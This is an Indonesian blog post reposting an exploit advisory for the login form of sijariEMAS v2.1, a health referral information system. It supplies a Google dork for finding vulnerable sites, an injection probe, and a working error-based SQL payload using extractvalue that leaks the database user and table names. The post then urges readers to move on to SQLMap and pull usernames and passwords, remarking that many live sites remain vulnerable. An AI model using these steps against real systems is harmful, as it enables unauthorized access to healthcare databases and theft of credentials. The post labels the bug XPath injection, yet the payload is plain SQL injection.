SijariEMAS v2.1 Login Xpath Injection Vulnerability - Indonesian Code Party

SijariEMAS v2.1 Login Xpath Injection Vulnerability

Hallo balik lagi hehe, Kali ini gue mau bagiin tutorial lagi nih. Setelah sebelumnya gue bagiin Tutorial SQL-Injection pada CMS Swarakalibata. Kali ini gue mau bagiin sijariEMAS v2.1 Login Xpath Injection. Lanjut gimana Proof Of Conceptnya and then Mungkin bagi kalian yang belum tau Xpath Injection itu apa kalian bisa baca disini

[+] Exploit Title: sijariEMAS v2.1 Login Xpath Injection Vulnerability
[+] Author: ./Sn00py
[+] Team: Indonesian Code Party
[+] Goolge Dork: "Intext:Sistem Informasi dan Komunikasi Jejaring Rujukan Pelayanan Kesehatan"
[+] Tested on: Linux Parrot
[+] Vendor: http://sijariemas.net/
=======================================
[+] Proof Of Concept:
Pertama, kalian harus mencari tahu apakah situs memiliki fitur login.

Jika ada firut login kalian coba memasukkan string (') tidak akan ada MySQL Syntax Error atau Kesalahan pada database apapun, tetapi jika kalian melanjutkan dengan ' order 100-- - dan Gotchaa! ' Unknown column '100' in 'order clause' berarti site tersebut rentan terhadap serangan SQL-Injection.

[+] Exploit:
' and extractvalue(0x0a,concat(0x0a,user(),0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))-- -

Dan Gotchaaa! Maka muncul user dari database tersebut berserta tablenya. Mungkin kalian bisa melanjutkan Injeksi melalui SQLMap atau dengan Xpath Injection secara manual untuk menemukan user:password.


[+] Demo? No Demo ^^ Happy Injecting~

Gimana cukup mudah bukan? btw ini masih banyak yang vuln loh tinggal kembangin aja dorknya. Oke mungkin cukup sekian dari saya dont forget too share and see you next time byee~

Source: https://cxsecurity.com/issue/WLB-2019010037



Posting Komentar

0 Komentar